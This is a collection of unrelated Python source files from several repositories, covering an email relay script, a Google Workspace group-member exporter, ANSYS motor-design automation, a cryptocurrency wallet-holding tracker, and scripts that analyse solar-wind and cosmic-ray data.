print("Exception while attempting to archive message {} to {}.".format(i, archive))
else:
if LIVE:
log.debug("Copied message {} to {}.".format(i, archive))
else:
log.debug("TEST ONLY: Live system would copy message {} to {}.".format(i, archive))
if (sentOK):
mndeleted.append(str(i))
# ====================================================================================
# All messages relayed, now mark them Deleted from INBOX
# Note: Do this in one fell swoop after all messages have been read.
if len(mndeleted):
log.debug('========================================================')
for i in mndeleted:
if LIVE:
cp.store(str(i), "+FLAGS", "\\Deleted")
log.debug("Marked message {} deleted in {}.".format(i, inbox))
else:
log.debug("TEST ONLY: Live system would mark message {} deleted in {}.".format(i, inbox))
# ====================================================================================
# Everything relayed, close connections
cp.logout()
if (cs != None):
cs.quit()
log.info("All done.")
print( "All done.")
print( "========================================================")
log.debug("========================================================")
``` |
{
"source": "jim-snyder-grant/google-admin-scripts",
"score": 3
} |
#### File: jim-snyder-grant/google-admin-scripts/groups.py
```python
HELP = "Extracts the emails from every group list in a given domain.\n\
Usage: python groups.py DOMAIN [CSV] [TEXT] \n\
DOMAIN - the domain to use, e.g mydomain.com\n\
optional output format arguments: \n\
TEXT (default) output as text\n\
CSV output as CSV\n\
"
import enum
import json
import os
import pickle
import sys
import google_auth_oauthlib
from google.auth.transport.requests import AuthorizedSession, Request
from google_auth_oauthlib.flow import InstalledAppFlow
from requests_oauthlib import OAuth2Session
#DOMAIN, name of the domain to work with
#DOMAIN = ''
# CLIENT_SECRETS, name of a file containing the OAuth 2.0 information for this
# application, including client_id and client_secret, which are found
# on the API Access tab on the Google APIs
# Console <http://code.google.com/apis/console>
CLIENT_SECRETS = 'client_secrets.json'
def get_creds():
scopes = ['https://www.googleapis.com/auth/admin.directory.group.member.readonly',
'https://www.googleapis.com/auth/admin.directory.group.readonly']
creds = None
if os.path.exists('token.pickle'):
with open('token.pickle', 'rb') as token:
creds = pickle.load(token)
if not creds or not creds.valid:
if creds and creds.expired and creds.refresh_token:
creds.refresh(Request())
else:
flow = InstalledAppFlow.from_client_secrets_file(CLIENT_SECRETS, scopes=scopes)
creds = flow.run_local_server()
# Save the credentials for the next run
with open('token.pickle', 'wb') as token:
pickle.dump(creds, token)
return creds
class Group:
class GroupType(enum.Enum):
Unknown = 0
Group = 1
Alias = 2
User = 3
Empty = 4
def __init__(self, group_json):
self.name = group_json['name']
self.email = group_json['email']
self.description = group_json['description']
self.type = Group.GroupType.Unknown
self.emails = {self.email}
if 'aliases' in group_json:
self.add_aliases(group_json['aliases'])
self.members = set()
def add_aliases(self, aliases: list[str]):
self.emails.update(aliases)
def create_groups(session, domain):
r = session.get('https://admin.googleapis.com/admin/directory/v1/groups',
params={'domain': domain, 'maxResults': 5000})
json_groups = r.json()['groups']
groups = {}
for g in json_groups:
if g['name'] == 'everyone':
continue
group = Group(g)
group.type = Group.GroupType.Group
if (0 == int(g['directMembersCount'])):
group.type = Group.GroupType.Empty
groups[g['email']] = group
return groups
def handle_aliases(groups):
for g in [g for g in groups.values() if g.type == Group.GroupType.Alias]:
assert(len(g.members) == 1)
target_email = next(iter(g.members))
if not target_email in groups:
# Reference to a user - this is actually a one member group
g.type = Group.GroupType.Group
continue
target = groups[target_email]
if target.type == Group.GroupType.Alias:
raise Exception('Alias to Alias not supported')
elif target.type == Group.GroupType.Group:
target.add_aliases(g.emails)
else:
# Target is a user - this is a one member group
g.type = Group.GroupType.Group
def list_group_members(session, groups, group):
if group.members:
# members already listed
return
r = session.get('https://admin.googleapis.com/admin/directory/v1/groups/{group_id}/members'.format(group_id=group.email))
if (group.type == Group.GroupType.Empty):
json_members = [{'email' : '(empty group)'}]
else:
json_members = r.json()['members']
for member in json_members:
member_email = member['email']
if member_email in groups:
target_group = groups[member_email]
if target_group.type == Group.GroupType.Group:
member_email = '~' + member_email
group.members.add(member_email.lower())
def list_members(session, groups):
for g in [g for g in groups.values() if g.type in {Group.GroupType.Group,Group.GroupType.Empty}] :
list_group_members(session, groups, g)
def print_groups(groups, domain, useCSV, useTEXT):
if useCSV:
with open(domain+'.list.csv', 'w') as fCSV:
for g in [g for g in groups.values() if g.type in {Group.GroupType.Group,Group.GroupType.Empty}]:
for member in sorted(g.members):
print(member + "," + g.name,file=fCSV)
print("created and filled " + fCSV.name)
if useTEXT:
with open(domain+'.list.txt', 'w') as fTXT:
for g in [g for g in groups.values() if g.type in {Group.GroupType.Group,Group.GroupType.Empty}]:
print (g.name, file=fTXT)
if g.description:
print(g.description, file=fTXT)
print(sorted(g.emails),file=fTXT)
for member in sorted(g.members):
print(member,file=fTXT)
print("",file=fTXT)
print("created and filled " + fTXT.name)
def main(argv):
sample = open('samplefile.txt', 'w')
print('GeeksForGeeks', file = sample)
sample.close()
argc = len(argv)
if 1 == argc:
print(HELP)
exit(0)
domain = argv[1]
print("Domain: " + domain)
hasCSV = "CSV" in argv
hasTEXT = "TEXT" in argv
#TEXT is the default
if not hasTEXT and not hasCSV:
hasTEXT = True
if (hasTEXT):
print("using text format")
if (hasCSV):
print("using csv format")
session = AuthorizedSession(get_creds())
groups = create_groups(session, domain)
# handle_aliases(groups)
list_members(session, groups)
print_groups(groups, domain, hasCSV, hasTEXT)
if __name__ == '__main__':
main(sys.argv)
``` |
{
"source": "JimsPalo/MotorDesignSPMSM",
"score": 2
} |
#### File: ANSYSDesign/AnalysisSetup/AnalysisSetup.py
```python
def AnalysisSetup(main):
"""This function setup the configuration for the analysis.
Args:
main (Dic): Main dictionary used to upload the necessary information.
Returns:
Dic: the main dictionary uploaded the oMolude, which is used to the analysis setup.
"""
# oDesign definition
oDesign = main['ANSYS']['oDesign']
# Set core losses
oModule = oDesign.GetModule("BoundarySetup")
oModule.SetCoreLoss(["Stator", "Rotor"], False)
# Defining the necessary module
oModule = oDesign.GetModule("AnalysisSetup")
# Multiplier
Multiplier = main['ANSYS']['AnalysisSetup']['Multiplier']
# Analysis name
AnalysisName = main['ANSYS']['AnalysisSetup']['Name']
# PercentError
PercentError = main['ANSYS']['AnalysisSetup']['PercentError']
# RefinementPerPass
RefinementPerPass = main['ANSYS']['AnalysisSetup']['RefinementPerPass']
# NonLinearResidual
NonLinearResidual = main['ANSYS']['AnalysisSetup']['NonLinearResidual']
# Design Settings
oDesign.SetDesignSettings(
[
"NAME:Design Settings Data",
"Perform Minimal validation:=", False,
"EnabledObjects:=" , [],
"PreserveTranSolnAfterDatasetEdit:=", False,
"ComputeTransientInductance:=", False,
"ComputeIncrementalMatrix:=", False,
"PerfectConductorThreshold:=", 1E+30,
"InsulatorThreshold:=" , 1,
"ModelDepth:=" , "Lenght",
"UseSkewModel:=" , False,
"EnableTranTranLinkWithSimplorer:=", False,
"BackgroundMaterialName:=", "vacuum",
"SolveFraction:=" , False,
"Multiplier:=" , str(Multiplier)
],
[
"NAME:Model Validation Settings",
"EntityCheckLevel:=" , "Strict",
"IgnoreUnclassifiedObjects:=", False,
"SkipIntersectionChecks:=", False
]
)
# Analysis setup
oModule.InsertSetup(
"Transient",
[
"NAME:" + AnalysisName,
"Enabled:=" , True,
[
"NAME:MeshLink",
"ImportMesh:=" , False
],
"NonlinearSolverResidual:=", "1e-06",
"TimeIntegrationMethod:=", "BackwardEuler",
"SmoothBHCurve:=" , False,
"StopTime:=" , "20ms",
"TimeStep:=" , "300us",
"OutputError:=" , False,
"UseControlProgram:=" , False,
"ControlProgramName:=" , " ",
"ControlProgramArg:=" , " ",
"CallCtrlProgAfterLastStep:=", False,
"FastReachSteadyState:=", False,
"AutoDetectSteadyState:=", False,
"IsGeneralTransient:=" , True,
"IsHalfPeriodicTransient:=", False,
"SaveFieldsType:=" , "Custom",
[
"NAME:SweepRanges",
[
"NAME:Subrange",
"RangeType:=" , "LinearStep",
"RangeStart:=" , "0ms",
"RangeEnd:=" , "20ms",
"RangeStep:=" , "300us"
]
],
"UseNonLinearIterNum:=" , False,
"CacheSaveKind:=" , "Count",
"NumberSolveSteps:=" , 1,
"RangeStart:=" , "0s",
"RangeEnd:=" , "0.1s",
"UseAdaptiveTimeStep:=" , False,
"InitialTimeStep:=" , "0.002s",
"MinTimeStep:=" , "0.001s",
"MaxTimeStep:=" , "0.003s",
"TimeStepErrTolerance:=", 0.0001
]
)
main['ANSYS']['AnalysisSetup']['oModule'] = oModule
# Developing the all analysis
# oDesign.AnalyzeAll()
print(oDesign.GetPostProcessingVariables())
return main
```
#### File: ANSYSDesign/MainOperations/OpenAnsoft.py
```python
from win32com import client
def OpenAnsoft(main):
"""Open ANSYS Electronics Application.
Args:
main (Dic): Contains the main information.
Returns:
Dic: Return the last Dictionary uploaded the main object for ANSYS managing.
"""
# Loading variables
ProjectName = main['ANSYS']['ProjectName']
DesignName = main['ANSYS']['DesignName']
# oDesktop object
oAnsoftApp = client.Dispatch('Ansoft.ElectronicsDesktop')
oDesktop = oAnsoftApp.GetAppDesktop()
# Restore a minimized window
oDesktop.RestoreWindow()
# oProject object
oProject = oDesktop.NewProject(ProjectName)
# oDefinitionManager
oDefinitionManager = oProject.GetDefinitionManager()
# oDesign object
oProject.InsertDesign('Maxwell 2D', DesignName, "Transient", '')
oDesign = oProject.SetActiveDesign(DesignName)
# Design view
oEditor = oDesign.SetActiveEditor("3D Modeler")
# updating variables
main['ANSYS']['oAnsoftApp'] = oAnsoftApp
main['ANSYS']['oDesktop'] = oDesktop
main['ANSYS']['oProject'] = oProject
main['ANSYS']['Materials']['oDefinitionManager'] = oDefinitionManager
main['ANSYS']['oDesign'] = oDesign
main['ANSYS']['oEditor'] = oEditor
return main
```
#### File: ANSYSDesign/Materials/StatorMaterial.py
```python
import numpy as np
import matplotlib.pyplot as plt
from scipy.interpolate import interp1d
def StatorMaterial(main):
"""This function adds the stator material
Args:
main (Dic): Main dictionary used to upload the information
Returns:
Dic: Same unmodified main dictionary.
"""
# oDefinitionManager
oDefinitionManager = main['ANSYS']['Materials']['oDefinitionManager']
# Material Name
StatorMaterialName = np.loadtxt('ANSYSDesign\\Materials\\StatorMaterialBHCurve.csv',
dtype='str', skiprows=2, usecols=1, unpack=True, delimiter=',', max_rows=1)
# BH curve
H, B = np.loadtxt('ANSYSDesign\\Materials\\StatorMaterialBHCurve.csv',
skiprows=5, unpack=True, delimiter=',')
# Core Losses Curves
# frequencies
frequencies = np.loadtxt('ANSYSDesign\\Materials\\StatorMaterialCoreLosses.csv',
dtype='str', skiprows=7, unpack=True, delimiter=',', max_rows=1)
frequencies = frequencies[1:]
# Curves
CoreLoss = np.loadtxt('ANSYSDesign\\Materials\\StatorMaterialCoreLosses.csv',
skiprows=9, unpack=True, delimiter=',')
# Units
Units = np.loadtxt('ANSYSDesign\\Materials\\StatorMaterialCoreLosses.csv',
dtype='str', skiprows=4, usecols=1, unpack=True, delimiter=',', max_rows=1)
Units = str(Units).split('/')
# Mass density in kg/m^3
MassDensity = np.loadtxt('ANSYSDesign\\Materials\\StatorMaterialCoreLosses.csv',
skiprows=5, usecols=1, unpack=True, delimiter=',', max_rows=1)
# Generation the argument for the Corelosses
InitialCurve = ["NAME:AllCurves"]
for freq in frequencies:
points = ["NAME:Points"]
for i, k in enumerate(CoreLoss[0, :]):
points.append(k),
points.append(CoreLoss[1, i])
ForFreq = [
"NAME:OneCurve",
"Frequency:=", freq+"Hz",
[
"NAME:Coordinates",
[
"NAME:DimUnits",
"",
""
],
points
]
]
InitialCurve.append(ForFreq)
# Generation of the data for the BH curve
InitialCurveBH = ["NAME:BHCoordinates", ["NAME:DimUnits", "", ""]]
for i, h in enumerate(H):
InitialCurveBH.append(["NAME:Point", h, B[i]])
# Uploading in Ansoft
oDefinitionManager.AddMaterial(
[
"NAME:"+str(StatorMaterialName),
"CoordinateSystemType:=", "Cartesian",
"BulkOrSurfaceType:=", 1,
[
"NAME:PhysicsTypes",
"set:=", ["Electromagnetic"]
],
[
"NAME:AttachedData",
[
"NAME:CoreLossMultiCurveData",
"property_data:=", "coreloss_multi_curve_data",
"coreloss_unit:=", Units[0]+"_per_"+Units[1],
InitialCurve
]
],
[
"NAME:permeability",
"property_type:=", "nonlinear",
"BTypeForSingleCurve:=", "normal",
"HUnit:=", "A_per_meter",
"BUnit:=", "tesla",
"IsTemperatureDependent:=", False,
InitialCurveBH,
[
"NAME:Temperatures"
]
],
[
"NAME:magnetic_coercivity",
"property_type:=", "VectorProperty",
"Magnitude:=", "0A_per_meter",
"DirComp1:=", "1",
"DirComp2:=", "0",
"DirComp3:=", "0"
],
[
"NAME:core_loss_type",
"property_type:=", "ChoiceProperty",
"Choice:=", "Electrical Steel"
],
"core_loss_kh:=", "184.233670546732",
"core_loss_kc:=", "0.386260592696451",
"core_loss_ke:=", "0.270231418332487",
"core_loss_kdc:=", "0",
"mass_density:=", str(MassDensity),
"core_loss_equiv_cut_depth:=", "0.001meter"
]
)
# B-H Curve Interpolation----------------------------------------------------------------
# Transforming en kA/m
H = H/1000
# Redefining useful range
# Here considerer as maximum a slop of 10 degrees
BHslop = (B[1:]-B[:-1])/((H[1:]-H[:-1]))-np.tan(np.pi*2.5/180)
HUseful = H[:-1][BHslop > 0.]
BUseful = B[:-1][BHslop > 0.]
# Interpolation using cubic spline
p = interp1d(HUseful, BUseful, kind='cubic')
p2 = interp1d(BUseful, HUseful, kind='cubic')
# Supersamplig the BH curve
Hnew = np.linspace(min(HUseful), max(HUseful), 10000)
Bnew = p(Hnew)
# Knee point finding
slop = (Bnew[1:]-Bnew[:-1])/((Hnew[1:]-Hnew[:-1]))-np.tan(45/180*np.pi)
HKnee = np.mean(Hnew[:-1][np.abs(slop) < 0.01])
fig, ax = plt.subplots(1, 1, figsize=(8, 4))
ax.plot(Hnew, Bnew, 'k', label='B-H Curve interp.')
ax.plot(HKnee, p(HKnee), 'x', label='Knee point')
ax.scatter(H, B, label='Data Points')
# Figure labeling
ax.legend(loc='lower right')
ax.set_xlim(min(HUseful), max(HUseful))
ax.set_ylim(min(BUseful), max(BUseful))
ax.set_ylabel(r'$B [T]$', fontsize=18)
ax.set_xlabel(r'$H [kA/m]$', fontsize=18)
# plt.show()
# Saving in main object
StatorMaterial = {}
StatorMaterial['StatorMaterialName'] = StatorMaterialName
# Saving the BH Curve ans HB Curve
StatorMaterial['BHCurve'] = [p, p2]
StatorMaterial['KneePoint'] = [HKnee, p(HKnee)]
StatorMaterial['MassDensity'] = MassDensity
main['ANSYS']['Materials']['Stator'] = StatorMaterial
return main
```
#### File: ANSYSDesign/Model/Region.py
```python
def Region(main):
"""This function creates the region and set the boundaries to the
machine analysis by FEM.
Args:
main (Dic): Main Dictionary than contain the necessary information.
Returns:
Dic: unmodified main dictionary.
"""
oEditor = main['ANSYS']['oEditor']
oDesign = main['ANSYS']['oDesign']
RegionName = main['ANSYS']['Region']['RegionName']
oModule = oDesign.GetModule("BoundarySetup")
OffsetPercent = main['ANSYS']['Region']['OffsetPercent']
# Drawing the Region
oEditor.CreateCircle(
[
"NAME:CircleParameters",
"IsCovered:=" , True,
"XCenter:=" , "0mm",
"YCenter:=" , "0mm",
"ZCenter:=" , "0mm",
"Radius:=" , "DiaYoke/2"+'*'+str(1+OffsetPercent/100),
"WhichAxis:=" , "Z",
"NumSegments:=" , "0"
],
[
"NAME:Attributes",
"Name:=" , RegionName,
"Flags:=" , "",
"Color:=" , "(143 175 143)",
"Transparency:=" , 0.75,
"PartCoordinateSystem:=", "Global",
"UDMId:=" , "",
"MaterialValue:=" , "\"vacuum\"",
"SurfaceMaterialValue:=", "\"\"",
"SolveInside:=" , True,
"ShellElement:=" , False,
"ShellElementThickness:=", "0mm",
"IsMaterialEditable:=" , True,
"UseMaterialAppearance:=", False,
"IsLightweight:=" , False
]
)
# Boundaries setting
Edges = oEditor.GetEdgeIDsFromObject(RegionName)
oModule.AssignVectorPotential(
[
"NAME:VectorPotential1",
"Edges:=" , [int(Edges[0])],
"Value:=" , "0",
"CoordinateSystem:=" , ""
]
)
oEditor.FitAll()
return main
``` |
{
"source": "Jimsparkle/bitinfo_holding_alert",
"score": 3
} |
#### File: src/bitinfo_holding_alert/main.py
```python
import logging
import sys
from typing import Optional
from bitinfo_holding_alert.config import TRACK_ADDRESS, TRACK_COIN
from bitinfo_holding_alert.scrap import get_wallet_holding_data
from bitinfo_holding_alert.cal import produce_time_series
LOGGER = logging.getLogger(__name__)
handler = logging.StreamHandler()
handler.setLevel(logging.DEBUG)
formatter = logging.Formatter('%(asctime)s - %(name)s - %(levelname)s - %(message)s')
handler.setFormatter(formatter)
LOGGER.addHandler(handler)
def bitinfo_holding_ts(
track_addr: Optional[str] = None,
track_coin: Optional[str] = None,
timeframe: Optional[str] = "4h",
sma: Optional[int] = 20,
):
"""Scrap the data from bitinfo and calculate the balance based on the resample frequency.
track_addr (str): The address to track.
track_coin (str): The coin to track.
timeframe (str): The resample frequency.
sma (int): The moving average window.
For example, if the website url is
https://bitinfocharts.com/dogecoin/address/DRSqEwcnJX3GZWH9Twtwk8D5ewqdJzi13k-full/
track_coin value would be `dogecoin` and track_addr would be `DRSqEwcnJX3GZWH9Twtwk8D5ewqdJzi13k`.
For timeframe, we support frequency that listed on pandas doc, common value would be '4h', '1h', '1d'
Full list of timeframe available: https://pandas.pydata.org/pandas-docs/stable/user_guide/timeseries.html#offset-aliases
"""
LOGGER.info(f"Scrapping data for {track_coin}, wallet address: {track_addr}")
track_addr = TRACK_ADDRESS if track_addr is None else track_addr
track_coin = TRACK_COIN if track_coin is None else track_coin
df_holding_ts = get_wallet_holding_data(
coin=track_coin,
address=track_addr,
)
balance_ts = produce_time_series(df_holding_ts, timeframe, sma)
return balance_ts
if __name__ == "__main__":
# balance_ts = bitinfo_holding_ts("DRSqEwcnJX3GZWH9Twtwk8D5ewqdJzi13k", "dogecoin", "4h", 20)
balance_ts = bitinfo_holding_ts("3FpYfDGJSdkMAvZvCrwPHDqdmGqUkTsJys", "bitcoin", "1h", 20)
print(balance_ts)
``` |
{
"source": "jimsrc/seatos",
"score": 2
} |
#### File: etc/etc/extract_struct.py
```python
from datetime import datetime, time, timedelta
from shared import shared_funcs as sf
import numpy as np
import argparse, os
#--- retrieve args
parser = argparse.ArgumentParser(
formatter_class=argparse.ArgumentDefaultsHelpFormatter
)
parser.add_argument(
'-inp', '--input',
type=str,
default='{HOME}/data_ace/64sec_mag-swepam/ace.1998-2014.nc'.format(**os.environ),
help='input filename of ACE data',
)
parser.add_argument(
'-in', '--inp_name',
type=str,
default='ACE',
help='name/flag of input data. Must be one of these: ACE, ACE_o7o6, Auger_BandMuons, Auger_BandScals, McMurdo.',
)
parser.add_argument(
'-rich', '--rich_csv',
type=str,
default='{ASO}/icmes_richardson/RichardsonList_until.2016.csv'.format(**os.environ),
help='.csv file for Richardson catalog of ICMEs',
)
parser.add_argument(
'-avr', '--avr',
type=str,
default='{ASO}/icmes_richardson/data/rich_events2_ace.nc'.format(**os.environ),
help='.csv file for Richardson catalog of ICMEs',
)
parser.add_argument(
'-dd', '--dir_data',
type=str,
default='../ascii',
help='directory for output data',
)
parser.add_argument(
'-dp', '--dir_plot',
type=str,
default='../plots',
help='directory for output plots',
)
parser.add_argument(
'-lim', '--limits',
type=float,
nargs=2,
default=[None,None], # no filter by default
help='limits for the values of the Vsw (SW speed), to define\
a filter of events. Recommended partition: 100, 450, 550, 3000.'
)
parser.add_argument(
'-obs', '--obs',
type=str,
nargs='+',
default=['B','rmsB'],
help="""
keyname of the variables to extract.
For ACE, use:
B, rmsB, rmsBoB, V, beta, Pcc, Temp, AlphaRatio.
For Auger_..., use:
CRs.
""",
)
parser.add_argument(
'-ts', '--tshift',
action='store_true',
default=False,
help='to perform a time-shift to ACE data, so that the\
time-stamps of data is consistent with Richardson\'s list of\
ICME borders.'
)
parser.add_argument(
'-if', '--icme_flag',
type=str,
default='2',
help="""
list of Richardson's ICME-flags. They are:
'0' for irregulars,
'1' for smooth B rotation,
'2' for MCs,
and '2H' for MCs by Huttunen etal05.
To specify several flags, separe by dots (e.g. '0.1.2H').
"""
)
parser.add_argument(
'-ba', '--BefAft',
type=int,
nargs=2,
default=[0,0],
help="""
Fractions of the extraction time-span in units of the time-width
of the structure. These fractions refer to before and
after the leading and trailing border respectively. Can
be float values.
Must be integers.
""",
)
parser.add_argument(
'-st', '--struct',
type=str,
default='sh.i', # sheath-of-icme
help='alias name of structure to analyze.\
Options are "sh.mc", "sh.i", "mc", "i" for sheath-of-mc, \
sheath-of-icme, mc, and icme respectively.',
)
parser.add_argument(
'-wang', '--wang',
type=float,
default=None,
help="""
If not used, ignores Wang's catalog. Otherwise, set a lower
threshold value to filter events according to its shock orientation,
using Wang's catalog.
NOTE: the orientation is 180 degrees close to the nose!
""",
metavar=('THRESHOLD',),
)
pa = parser.parse_args()
class boundaries:
def __init__(self):
name = 'name'
HOME = os.environ['HOME']
gral = sf.general()
day = 86400.
#---- cosas input
gral.fnames = fnames = {}
fnames[pa.inp_name] = pa.input #'%s/data_ace/64sec_mag-swepam/ace.1998-2014.nc' % HOME
fnames['McMurdo'] = '%s/actividad_solar/neutron_monitors/mcmurdo/mcmurdo_utc_correg.dat' % HOME
fnames['table_richardson'] = pa.avr # .nc file w/ average values
#---- directorios de salida
gral.dirs = dirs = {}
dirs['dir_plots'] = pa.dir_plot #'../plots'
dirs['dir_ascii'] = pa.dir_data #'../ascii'
dirs['suffix'] = '_test_Vmc_' # sufijo para el directorio donde guardare
#------- seleccionamos MCs con label-de-catalogo (lepping=2, etc)
MCwant = {'flags': pa.icme_flag.split('.'), #('2',),
'alias': pa.icme_flag } #'2'} # para "flagear" el nombre/ruta de las figuras
FILTER = {}
FILTER['Mcmultiple'] = False # True para incluir eventos multi-MC
FILTER['CorrShift'] = pa.tshift #True
FILTER['wang'] = pa.wang if pa.wang is not None else False #False/True
FILTER['vsw_filter'] = True
FILTER['z_filter_on'] = False
FILTER['MCwant'] = MCwant
FILTER['B_filter'] = False
FILTER['filter_dR.icme'] = False #True
FILTER['choose_1998-2006'] = False
CUTS = {}
CUTS['ThetaThres'] = 90.0 # all events with theta>ThetaThres
CUTS['dTday'] = 0.0
CUTS['v_lo'] = 550.0
CUTS['v_hi'] = 3000.0
CUTS['z_lo'] = -50.0
CUTS['z_hi'] = 0.65
nBin = {}
nBin['before'] = pa.BefAft[0] #2
nBin['after'] = pa.BefAft[1] #4
nBin['bins_per_utime'] = 50 # bins por unidad de tiempo
nBin['total'] = (1+nBin['before']+nBin['after'])*nBin['bins_per_utime']
fgap = 0.2
#--- bordes de estructura
tb = sf.RichTable(pa.rich_csv)
tb.read()
#--- bordes de estructura
bounds = boundaries()
if pa.struct=='sh.i':
bounds.tini = tb.tshck #tb.tini_mc #tb.tshck
bounds.tend = tb.tini_icme #tb.tend_mc #tb.tini_mc
elif pa.struct=='sh.mc':
bounds.tini = tb.tshck
bounds.tend = tb.tini_mc
elif pa.struct=='i':
bounds.tini = tb.tini_icme
bounds.tend = tb.tend_icme
elif pa.struct=='mc':
bounds.tini = tb.tini_mc
bounds.tend = tb.tend_mc
else:
raise SystemExit(' ---> wrong structure! : '+pa.struct)
from copy import deepcopy
bounds = deepcopy(bounds)
from shared import readers
#+++++++++++++++++++++++++++++++++++++++++++++++++
gral.data_name = pa.inp_name #'ACE'
FILTER['vsw_filter'] = False
emgr = sf.events_mgr(gral, FILTER, CUTS, bounds, nBin, fgap, tb, None, structure=pa.struct, verbose=True)
#++++ limites
emgr.FILTER['vsw_filter'] = False if pa.limits==[None,None] else True
emgr.CUTS['v_lo'], emgr.CUTS['v_hi'] = pa.limits
emgr.filter_events()
emgr.load_files_and_timeshift_ii(
_data_handler = getattr(readers,'_data_'+emgr.data_name),
obs_check = pa.obs
)
emgr.rebine(collect_only=True)
# save to file
#---- dest directory
#assert os.path.isdir(pa.dir_data), \
# " ## ERROR ## --> doesn't exist: "+pa.dir_data
dir_dst = '%s/MCflag%s' % (pa.dir_data, FILTER['MCwant']['alias'])
if FILTER['CorrShift']:
dir_dst += '/wShiftCorr/events_data'
else:
dir_dst += '/woShiftCorr/events_data'
if not(os.path.isdir(dir_dst)): os.system('mkdir -p '+dir_dst)
#-------------------
events = emgr.out['events_data'].keys()
n_evnts = len(events)
nobs = len(pa.obs)
for id, i in zip(events, range(n_evnts)):
myid = int(id[3:])
#--- construct header/footer
dtsh = emgr.dt_sh[myid] # [days] sheath duration
dtmc = emgr.dt_mc[myid] # [days] MC duration
dt = (bounds.tend[myid]-bounds.tini[myid]).total_seconds()/86400.
HEADER=''+\
'ini ({struct}) : {date}'.format(
struct=pa.struct,
date=emgr.bd.tini[myid].strftime('%d %B %Y %H:%M'),
)+'\n'+\
'end ({struct}) : {date}'.format(
struct=pa.struct,
date=emgr.bd.tend[myid].strftime('%d %B %Y %H:%M'),
)
FOOTER=''+\
'dt [days]: %g\n' % dt +\
'dt_sheath [days]: %g\n' % dtsh +\
'dt_MC [days]: %g' % dtmc
#--- get the data
for obs, io in zip(pa.obs, range(nobs)):
buffer = emgr.out['events_data'][id][obs+'.'+emgr.data_name] # [dummy1]
data_out = np.array([buffer.time, buffer.data]).T
fname_out = '%s/event.data_%s_vlo.%04d_vhi.%04d_id.%03d.txt' % (dir_dst, obs+'.'+emgr.data_name, emgr.CUTS['v_lo'], emgr.CUTS['v_hi'], myid)
np.savetxt(fname_out,data_out,header=HEADER,footer=FOOTER,fmt='%g')
print " --> saved in: "+dir_dst
#EOF
```
#### File: src/icme.par/funcs.py
```python
from pylab import *
import numpy as np
from scipy.io.netcdf import netcdf_file
def make_plot(DIR_INP, FILTER, CUTS, nBin):
MCwant = FILTER['MCwant']
fgap = FILTER['fgap']
WangFlag = FILTER['WangFlag']
FNAME = 'MCflag%s_%dbefore.%dafter_fgap%1.1f' % (MCwant, nBin['before'], nBin['after'], fgap)
FNAME += '_Wang%s' % (WangFlag)
if FILTER['vsw_filter']:
FNAME += '_vlo.%03.1f.vhi.%04.1f' % (CUTS['v_lo'], CUTS['v_hi'])
if FILTER['z_filter_on']:
FNAME += '_zlo.%2.2f.zhi.%2.2f' % (CUTS['z_lo'], CUTS['z_hi'])
if FILTER['B_filter']:
FNAME += '_Blo.%2.2f.Bhi.%2.2f' % (CUTS['B_lo'], CUTS['B_hi'])
if FILTER['filter_dR.icme']:
FNAME += '_dRlo.%2.2f.dRhi.%2.2f' % (CUTS['dR_lo'], CUTS['dR_hi'])
fname_inp = DIR_INP + '/' + '_stuff_' + FNAME + '.nc'
finp = netcdf_file(fname_inp, 'r')
#print finp.variables; finp.close()
VARNAMES = finp.variables.keys()
prom = {}
for varname in VARNAMES:
if varname[:2]=='dt' or varname[:2]=='ID':
continue # estos no los quiero
mvs = finp.variables[varname].data
prom[varname] = np.mean(mvs)
del mvs # borramos referencias al archivo
finp.close()
return prom
```
#### File: n_CR/individual/_func_data.py
```python
import numpy as np
#++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
class gral():
def __init__(self):
self.name = ''
class mgr_data():
def __init__(self, dir_inp_sh, dir_inp_mc, fname_inp_part):
self.dir_inp_sh = dir_inp_sh
self.dir_inp_mc = dir_inp_mc
self.fname_inp_part = fname_inp_part
#self.vlo, self.vhi = vlo, vhi
def run(self, vlo, vhi):
"""
Antes de correr esto, hay q definir las
variables miembro "self.vlo, self.vhi" desde
afuera
"""
dir_inp_sh = self.dir_inp_sh
dir_inp_mc = self.dir_inp_mc
fname_inp_part = self.fname_inp_part
sh, mc, cr = gral(), gral(), gral()
cr.sh, cr.mc = gral(), gral()
fname_inp = fname_inp_part+'_vlo.%4.1f.vhi.%4.1f'%(vlo, vhi)
self.vlo, self.vhi = vlo, vhi
#--- rmsB
fname_sh = dir_inp_sh + '/%s_rmsB.txt' % fname_inp
fname_mc = dir_inp_mc + '/%s_rmsB.txt' % fname_inp
sh.data = np.loadtxt(fname_sh).T
mc.data = np.loadtxt(fname_mc).T
sh.t, sh.rmsB = sh.data[0], sh.data[2]
mc.t, mc.rmsB = mc.data[0], mc.data[2]
#--- B
fname_sh = dir_inp_sh + '/%s_B.txt' % fname_inp
fname_mc = dir_inp_mc + '/%s_B.txt' % fname_inp
sh.data = np.loadtxt(fname_sh).T
mc.data = np.loadtxt(fname_mc).T
sh.t, sh.B = sh.data[0], sh.data[2]
mc.t, mc.B = mc.data[0], mc.data[2]
#++++++++++++++++++++++++++++++++++++++++++++++++++++
fname_sh = dir_inp_sh + '/%s_CRs.txt' % fname_inp
fname_mc = dir_inp_mc + '/%s_CRs.txt' % fname_inp
cr.sh.data = np.loadtxt(fname_sh).T
cr.mc.data = np.loadtxt(fname_mc).T
cr.sh.t, cr.sh.avr = cr.sh.data[0], cr.sh.data[2]
cr.mc.t, cr.mc.avr = cr.mc.data[0], cr.mc.data[2]
self.sh = sh
self.mc = mc
self.cr = cr
return sh, mc, cr
"""
vlo, vhi = 550.0, 3000.0 #100.0, 450.0 #550.0, 3000.0
dir_inp_sh = '../../../sheaths/ascii/MCflag2/wShiftCorr/_test_Vmc_'
dir_inp_mc = '../../../mcs/ascii/MCflag2/wShiftCorr/_test_Vmc_'
fname_inp_part = 'MCflag2_2before.4after_fgap0.2_Wang90.0_vlo.%4.1f.vhi.%4.1f' % (vlo, vhi)
"""
```
#### File: n_CR/individual/mk_fig.py
```python
from pylab import *
#from load_data import sh, mc, cr
import func_data as fd
import share.funcs as ff
#import CythonSrc.funcs as ff
import matplotlib.patches as patches
import matplotlib.transforms as transforms
from os import environ as env
from os.path import isfile, isdir
from h5py import File as h5
#++++++++++++++++++++++++++++++++++++++++++++++++++++
class Lim:
def __init__(self, min_, max_, n):
self.min = min_
self.max = max_
self.n = n
def delta(self):
return (self.max-self.min) / (1.0*self.n)
dir_inp_sh = '{dir}/sheaths.icmes/ascii/MCflag0.1.2.2H/woShiftCorr/_auger_' .format(dir=env['MEAN_PROFILES_ACE'])
